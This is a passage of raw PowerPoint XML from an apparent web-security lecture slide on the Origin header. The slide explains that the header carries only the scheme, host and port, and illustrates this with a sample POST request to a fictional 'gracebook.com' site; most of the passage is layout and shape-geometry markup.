            <a:off x="1930400" y="3790019"/>
            <a:ext cx="7518400" cy="2568289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="51647" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="121917" marR="4439809">
              <a:spcBef>
                <a:spcPts val="407"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/share.php </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-947" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.gracebook.com </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Mozilla/5.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Accept:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> */*</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121917"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Content-Type:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-33" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>application/x-www-form-urlencoded;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121917">
              <a:spcBef>
                <a:spcPts val="7"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>charset=UTF-8</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121917"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="40" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.gracebook.com/</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121917"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="120" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>auth=beb18dcd75f2c225a9dcd71c73a8d77b5c304fb8</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121917"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>text=hi</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>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5447" y="450638"/>
            <a:ext cx="4257887" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1610360"/>
            <a:ext cx="10607040" cy="1987916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="474121" marR="6773" indent="-458035">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Instead</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sending</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>whole</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>referring</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URL,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-940" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>might</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>leak</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>information,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>referring </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>scheme,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>host,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>port.</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930400" y="3790019"/>
            <a:ext cx="7518400" cy="2585719"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5638800" h="1939289">
                <a:moveTo>
                  <a:pt x="0" y="1939036"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5638800" y="1939036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5638800" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1939036"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2035725" y="3825239"/>
            <a:ext cx="2980267" cy="1001983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>/share.php </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>HTTP/1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-947" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.gracebook.com </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Mozilla/5.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Accept:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> */*</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2035726" y="4800601"/>
            <a:ext cx="6538807" cy="1548351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Content-Type:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-33" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>application/x-www-form-urlencoded;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>charset=UTF-8</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Origin:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="40" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.gracebook.com/</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="140" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>auth=beb18dcd75f2c225a9dcd71c73a8d77b5c304fb8</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="53"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1867">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933"/>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>text=hi</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6079067" y="3615267"/>
            <a:ext cx="2472267" cy="1809327"/>
            <a:chOff x="4559300" y="2711450"/>
            <a:chExt cx="1854200" cy="1356995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2724150"/>
              <a:ext cx="1828800" cy="1331595"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1828800" h="1331595">
                  <a:moveTo>
                    <a:pt x="762000" y="967740"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="304800" y="967740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15621" y="1331518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="762000" y="967740"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1828800" h="1331595">
                  <a:moveTo>
                    <a:pt x="1667510" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="161289" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118430" y="5764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79906" y="22032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47259" y="47259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22032" y="79906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5764" y="118430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="161289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="806450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5764" y="849353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22032" y="887889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47259" y="920527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79906" y="945736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118430" y="961983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161289" y="967740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1667510" y="967740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710369" y="961983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748893" y="945736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781540" y="920527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806767" y="887889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823035" y="849353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="806450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1828800" y="161289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1823035" y="118430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806767" y="79906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781540" y="47259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748893" y="22032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710369" y="5764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1667510" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="4F81BC"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4572000" y="2724150"/>
              <a:ext cx="1828800" cy="1331595"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1828800" h="1331595">
                  <a:moveTo>
                    <a:pt x="0" y="161289"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5764" y="118430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22032" y="79906"/>
                  </a:lnTo>
                  <a:lnTo>
